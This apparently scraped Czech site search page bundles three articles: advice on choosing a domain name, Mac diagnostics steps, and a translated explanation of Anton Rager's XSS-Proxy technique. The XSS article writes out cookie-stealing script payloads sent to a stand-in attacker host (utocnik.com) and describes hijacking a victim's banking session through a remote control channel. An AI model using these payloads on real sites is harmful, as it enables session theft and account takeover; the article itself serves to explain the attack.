Výsledky vyhledávání v sekci SEO a vyhledávače na dotaz reference

Doména pro www stránku jak si správně vybrat

access_time21.březen 2020personRedakce

Podíváme se na to, jak správně si vybrat doménu pro Vaši webovou stránku. Nejdříve co znamená lidsky doména. Doména pro www stránku neboli jméno internetové stránky je označení pro snadné nalezení na internetu. Jestli znáte doménu nějaké webové prezentace, tak stačí jí zadat v prohlížeči a hned se Vám objeví požadovaná stránka. Každá webová stránka má vlastní unikátní doménu. V průběhu tvorby webových stránek by se mělo řádně promyslet jaký název by měla internetová stránka dostat, aby se předešlo zbytečným problémům.Doména musí být jednoducháVybrat doménu Vám pomůže společnost, která se zabývá prodejem domén. Na jejich stránkách máte políčko kam zadáte název a hned se Vám ukáže jestli je doména volná nebo už je obsazená. Před zakoupením jména pro Vaší budoucí internetovou stránku dbejte na to, aby byl název jednoduchý, jednoduše zapamatovatelný a aby nenastal problém ji sdělit klientovi přes telefon. Doména by neměla být zbytečně dlouhá, aby se nemusela zapisovat a byla lehce zapamatovatelná. Použití názvu firmy v doméně je nejlepší způsob jak podtrhnou svojí identitu.Myslete do budoucna při výběru doményV případě že jste menší firma, nezapomínejte na to, že jednou můžete být velká společnost a proto doporučujeme pořídit si nejenom doménu s koncovkou .cz ale i jinou jako je .com .net a další. Důvod je jednoduchý a to ten že v případě, že si budete chtít pořídit stejný název pro Vaší doménu bude obsazena a budete muset zaplatit hodně peněz za odkoupení od člověka, který ji sice nepotřebuje, ale s pomocí Vás si vydělá. V případě že pracujete mezinárodně taktéž doporučujeme si pořídit domény se stejným názvem, ale s koncovkou jiných státu jako například .de pro Německo, .ru pro Rusko a nebo .sk pro Slovensko.Klíčový slova v názvu doményV dnešní době hodně firem zabývající se optimalizací pro vyhledávače Vám doporučí dát si do domény vyhledávající výrazy. My však tuhle metodu nedoporučujeme, firmy které Vám to doporučí si usnadňují za pomocí tohoto tahu práci, ale nenechte se nachytat. Vezmeme to logicky, v doméně je možné použít jen jedno klíčové slovo, ale to předpokládáme, že Vám nestačí. Doména bude zbytečně dlouhá například „nejlevnejsi-ubytovani-v-chorvatku-split.cz“ a proto nebude snadno zapamatovatelná. Ztrácíte místo pro identifikaci Vaši firmy. A nakonec pro optimalizaci pro vyhledávače je to sice výhodnější a dostanete plus u vyhledávače, ale i když použijete klíčový slova v doméně, ve výsledcích nebudete jenom Vy, ale i konkurence přesto že by měla klíčová slova v doméně.Jak správně vymyslet název doményJak jsem již říkal, je lepší, aby byla doména kratší, ale stává se, že do názvu je třeba dát dvě a více slov, proto doporučujeme dávat mezi slova pomlčky usnadňuje to čtení Vaším klientům a snadněji si doménu zapamatují, například pneuservis-stepanek.cz než pneuservisstepanek.cz. Aby se nestalo, že člověk zadá název, bez pomlčky doporučujeme si pořídit doménu i bez ní a nastavit přesměrování.Firmy nabízející nákup doményVybírejte si společnosti, které už jsou dlouho na trhu, levné služby neznamenají vždy kvalitní služby a v tomto případě obzvlášť. Podívejte se na reference, které má daná společnost. Prozkoumejte a zeptejte se na administrační část k doméně, aby byla možnost snadně nastavit email k doméně a změnu DNS záznamu.Vybírejte doménu bez problémů se zákonemPřed vybráním zkontrolujte jestli vybraný název není patentovaní jako třeba Microsoft nebo Apple. Nebyl by to nejlepší výběr.Lhůta platnosti doményNepromeškejte dobu platnosti domény. Doména se většinou kupuje na jeden rok ale můžete samozřejmě koupit i na delší dobu. Musíte být řádně informováni předem od společnosti která má na starosti Vaší doménu o prodloužení, aby se nestalo to že Vám doménu koupí někdo jiný.Přejeme hodně úspěchu při koupi domény. V případě, že by jste potřebovali pomoci při koupi nebo zřízení domény, můžeme vše prokonzultovat.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Operační systémy a Aplikace na dotaz reference

Jak použít Apple Diagnózu k řešení Mac probémů

access_time22.květen 2019personRedakce

Ve velmi vzácných případech, a to i přes to, že Apple vybírá pouze kvalitní komponenty, se můžeš setkat s boot problémem, grafickým problémem, případně s něčím jiným, co by ti vadilo při práci s Macem. V této krizové situaci hned nemusíš bežet do Apple Store, ale stačí aby si postupoval podle tohoto návodu, který dokáže vyřešit běžné Mac problémy nebo alespoň poukáže na to, co je špatně.1. Odpoj všechna příslušenstvíAby se vyloučily jakékoli problémy s příslušenstvím připojeným k počítači Mac, je třeba nejprve zajistit, aby všechny externí pevné disky, mikrofony, reproduktory a další příslušenství byly odpojeny od počítače. Připojeny nech pouze monitor, myš a klávesnici a můžeš pokračovat.Pokud zjištíš, že tvůj počítač funguje normálně bez jakéhokoli příslušenství, pak připojuj příslušenství jedno po druhém, dokud nenajdeš příslušenství, které je příčinou problému.2. Spusť Apple Hardware TestRestartuj počítač a drž „D“. Budeš automaticky přesměrován na Apple Diagnostiku. Sleduj průběh diagnostiky a na konci si napiš kódy problémů, které můžeš ukázat pracovníkům v Apple Store. Tady můžeš najít seznam reference kódů.3. Klávesové zkratkyExistuje několik klávesových zkratek, které ti ulehčí orientaci při průběhu diagnostiky.Command + G – Zobrazit příručku ZačínámeCommand + L – Zobrazit obrazovku pro výběr jazykaCommand + R – Opětovné spuštění DiagnostikyS – Vypnout MacR – Restartovat MacPozn. při použití restartu nebo vypnutí, může dojít k mírnému zpoždění příkazu.

folder_openPřiřazené štítky

Výsledky vyhledávání v sekci Hacking na dotaz reference

Pokročilé techniky xss (cross-site scripting)

access_time16.červen 2020personRedakce

Popis pokročilého Cross-Site-Scriptingu, se vzdálenou kontrolou v reálném čase, od autora aplikace XSS-proxy jménem Anton Rager. Cross Site Scripting (XSS) je mnoha vývojáři a security profesionály obvykle považován za málo závažnou bezpečnostní zranitelnost. Do dnešní doby vznikla řada projektů s poukazem na potencionální rizika XSS, ale problém je převažne na pokraji zájmu bezpečnostních expertů a to včetně širších souvislostí o které tady jde.Autor aplikace XSS proxy napsal a zveřejnil popis v naději, že se odlehčený pohled na věc změní. Cituji: Doufám, že tímto dokumentem a vydáním nástroje pod jménem XSS-proxy (popsáno níže) změním pohled na celou situaci. XSS-Proxy umožňuje plnou kontrolu XSS útoků vzdáleným uživatelem (útočníkem). Tento dokument popisuje obvyklé XSS útoky a představuje nové metody/nástroje pro vytváření interaktivních XSS útoků, obojsměrných útoků a ještě více zla.Nejedná se o detailní návod (XSS howto), ale o širší vysvětlení metod XSS útoků. CGISecurity XSS FAQ (1) je dobrý zdroj pro celkový pohled na problematiku hlavních XSS zranitelností. V závěru textu jsou reference (2,3,4,5) obsahujíci skvělý materiál pro navazujíci XSS témata.Projekt XSS-proxy nevznikl jako platforma pro diskuzi a řešení. Existuje celá řada zdrojů, metod a možností pro hlášení chyb nebo opravování XSS děr. Pokročilé metody XSS které budou v textu představeny obcházejí mnoho metod aplikovaných proti XSS zranitelnostem. Doporučené čtení o hidden form inputs, URL re-writing, POST methods častokrát podsouvají řešení které nejsou 100% učinné, obzvlásť v případě, že má útočník přístup ke stejnému obsahu (a jscript/values) jako jeho oběť. Zbavit se všech speciálních HTML znaků nebo precizní filtrování vstupu je k ničemu v případě, že existuje neobjevený způsob jak vstup obelstít. Řešením může být rozdelení webových stránek na četné dokumentové domény, kde bude pro útočníka mnohem obtížnější provést/najít XSS útok/zranitelnost v porovnání s jediným místem kde je vše pohromadě. CGI vyhledávání na stránce v jedné subdoméně a citlivé oblasti na další(ch) může být užitečné.Pozadí XSSJako mnoho z vás ví, běžné XSS útoky vycházejí typicky ze dvou základních principů:1 – Útočník uploaduje <script> tag do veřejného fóra, blogu nebo stránek které navštevují uživatelé a obsahují XSS zranitelnost. Útočník pak díky přístupu získa (harvesting cookies) cookies webové stránky ze kterých vyčte řadu důležitých informací a díky tomu častokrát i přítpup k uživatelským účtum. Útoky jsou ale někdy využitelné mnohem hlouběji. Zde je to co myslím a říkam mnoha lidem co XSS přesně znamená. Příklad:Někdo chce odeslat následujíci kód na utocnik.com aby to další uživatelé sprocesovali.<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>Je to pokus o získání obrázku ze serveru útočníka pomocí cookies uživatele blogu priklad.com v URL.2 – Útočník použije veřejný web náchylný na útok XSS jak bylo uvedeno nahoře, nebo email zprávu založenu na XSS pro přesměrování uživatele na druhý server zranitelný pomocí XSS. Druhý server je aktuální cíl útočníka a stránka samozřejme obsahuje vlastní XSS zranitelnost, kde nic netušíci uživatel injektuje obsah <script> do dokumentu, který navenek pouze vidí. To v kombinaci s přesměrováním z dalšího webu umožňuje podvržení cookies, podvržení form/submit obsahu nebo specifickou akci XSSnutého uživatele proti dalšímu webu. Tato metoda je hodně rozšířena ale pramálo admiínistrátorů chápe, že se jedná o způsob útoku. Jak to funguje?Někdo chce odeslat následujíci kód na priklad.com aby to další uživatelé sprocesovali. <script>document.location=’http://ebanking.com/search?name=<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>'</script>Moment kdy je uživatel přesměrován na ebanking.com s hořejší XSS, toto je to co se vrátí uživateli a bude spuštěno:<script>document.write(„<img src=http://utocnik.com/“ + document.cookie + „>“)</script>To je pokus o získání obrázku ze serveru útočníka s cookies uživatele ebanking.com v URL.V minulosti hodně lidí zdůrazňovalo, že pokročilou manipulaci s webovým obsahem lze dosáhnout s XSS skriptem otevirajícím IFRAME (nebo další windows-like element) a loads/submits pro další dokumenty na stejné stránce. Důvěra v DOM umožňuje přítomnost Javascriptu v dokumentech a dovoluje interakci s dalšími windows/IFRAME, do doby než budou okna směrována do stejné dokumentové domény (protokol + domain_name + port).Aktuální metody XSS útoků jsou typicky limitovány pro jednu transakci a ve výsledku pouze v rámci cílové stránky, cookie harvesting nebo podvržení formuláře (form submission leakage). Zásady XSS-Proxy / ÚtokuXSS-Proxy rozšířuje běžné XSS útoky a kombinuje je s možností vykonání dalších Javascript příkazů, z libovolného vzdáleného serveru (viz Javascript Remoting reference číslo (6) pro detaily s IFRAME) pro možnost XSS být více než-li přesměrování s únikem cookies. Tato kombinace útočnikovi umožňuje ustavit stabilní, obousměrný kontrolní/přenosový kanál na oběť XSS a tím přistupovat na XSSnuté webové stránky s identitou oběti. Po celou dobu co má oběť útočníka otevřené XSS okno má útočník totální kontrolu nad prohlížečem oběti oproti XSS stránce s možností přesměrování na další stránky zranitelné XSS, nebo předání specifického blind requestu dalším serverům (viz reference číslo (3) provádění Cross-Site-Request-Forgeries aka CSRF a reference číslo (4) pro Session-Riding).Zmíněné situace lze dosáhnou s jedním nebo druhým útokem popsaným nahoře, teď se pokusíme názorně popsat příklad dvojího XSS přesměrování serveru. Oběť dostane XSS vektor pomocí blogu, diskuzního boardu, emailem atp. (předpokládaejme, že oběť surfuje na webech kde je možné vytvořit XSS – zavoláme stránku spatnyblog.com) a Javascript obsah přesměruje uživatele na druhou stránku (zavoláme druhou stránku ebanking.com a předpokládame samozřejmě, že stránka obsahuje XSS vo vyhledávací funkci, takže můžeme opakovat pomocí GET). Přesměrovací URL referuje na refers to a napadnutelnou část (cgi/etc) na druhém serveru což způsobý odezvu serveru která bude obsahovat Javascript příkaz útočníka který oběť vykoná.Inicializační XSS vektor na spatnyblog.com bude vypadat nějak takhle:<script>document.location=“http://ebanking.com/search?name=<script src=’http://utocnik.com/xss.js‘></script>“</script>Okno oběti teď má dokumentovou doménu ebanking.com a Javascript příkazy běží na doméně. Díky Javascript oběť posílá requesty na http://utocnik.com pro další skriptové příkazy. Nástroj XSS-Proxy aktuálně běží na utocnik.com a posyktuje další Javascripty pro inicializaci klientské části obsahujíci třeba funkce pro čtení dokumentů, procesování, přesměrování odpovědí, manipulaci chyb (error handling), stejně jako další příkazy pro vytvoření IFRAME, načtení root dokumentu (/) na cílovém serveru (ebanking.com) do IFRAME, načtení trvá pár vteřin, čtení obsahu (za použití innerHTML), pak následují další požadavek skriptů na http://utocnik.com. To vypadá komplexně ale jedná se pouze o několik řešení a reference časovač pro více volání skriptu na XSS-Proxy server. Funkce zůstanou v paměti až do doby než se okno oběti změní. Co se stane když od oběťi odejdou na http://utocnik.com subsekvenční skript requesty? Aktuálně se stanou dvě věci:1 – Obsah dokumentu v IFRAME (výsledky innerHTML pro daný objekt) jsou podvrženy do URL v skript requestu. Requesty skriptu jsou pouze GET, takže všechny volání skriptu obětí jsou jako volání normálniho dokumentu a ukládají parm/info na URL za jméno skriptu/stránky. Toto volání skriptu způsobý na serveru útočníka něco jako:GET /xss.js?data=Encoded_innerHTML_Contents HTTP/1.1Je to o něco víc komplexnější než to, že IE limituje délku URL (na přibližně 2049 znaků), takže většina dokumentů bude potřebovat naporcovat na části, které se na skritp URL request budou schopny dát dohromady. Aktuální nástroje se s tímto snaží vypořádat tak, že umísťují do URL dotazů přídavné informace pro znovusestavení (podobně jak to funguje u TCP/IP paketů).2 – Server na http://utocnik.com odpoví na poslední požadavek skriptu s více skirpt příkazy pro zachování trvání. Server buďto odpoví pomocía.) loop requestu (obyčejně řekne oběti počkej pár vteřin, pak znovu zkontroluj zda-li existují další příkazy skriptu)b.) dokument requestu (vlož dokument do IFRAME, přečti ho a přepošli výsledky pokud tě o to skript požádá)c.) submit requestu (nastav hodnoty vstupu ve formuláři s IFRAME, odešli, čekej na odpověď, přečti odpověď přepošli výsldek zpátky pokud o to skript požádá).Nebo pomocí javascript var/funkce požadavek na vyhodonocení (vyhodnoť výraz uvnitř aktuálniho okna v prohlížeči oběti a vrať výsledek+get příkazy). Proces pokračuje tak dloho jak oběť setrváva na stejné stránce.Zde je ASCII vizualizace okna a vysvětlení v souvislostech s cílem útočníka, po tom co je oběť přesměrována na finálni cíl a inicializován únos session:Existuje řada metod pro zamaskování aktuálniho „rezidentního“ okna pro útok (attack window) nebo IFRAME zaváděče. Celé okno lze schovat, stejně tak zrušit původní obsah stránek nebo proste použít skrytý IFRAME. Nástroj XSS-Proxy o kterém mluvíme, necháva okno včetně IFRAME pro oběť viditelné, ale modifikace je triviální (třeba interaktivně s Javascript Eval from). Existují i metody jak donutiti uživatele otevřít nové okno a obejít blokování pop-up oken. Jak? XSS proces přepíše odkazy v originálním dokumentu a otevření okne je pak pouze otázkou kliku. Nové oknomůže být kopii (zrcadlem) toho co si uživatel právě prohlíží, nebo výsledek odkliknutého odkazu ve veřejném XSS dokumentu a zmanipuluje oběť tak, že okno kontrolované XSS nechá běžet když dál surfuje.

folder_openPřiřazené štítky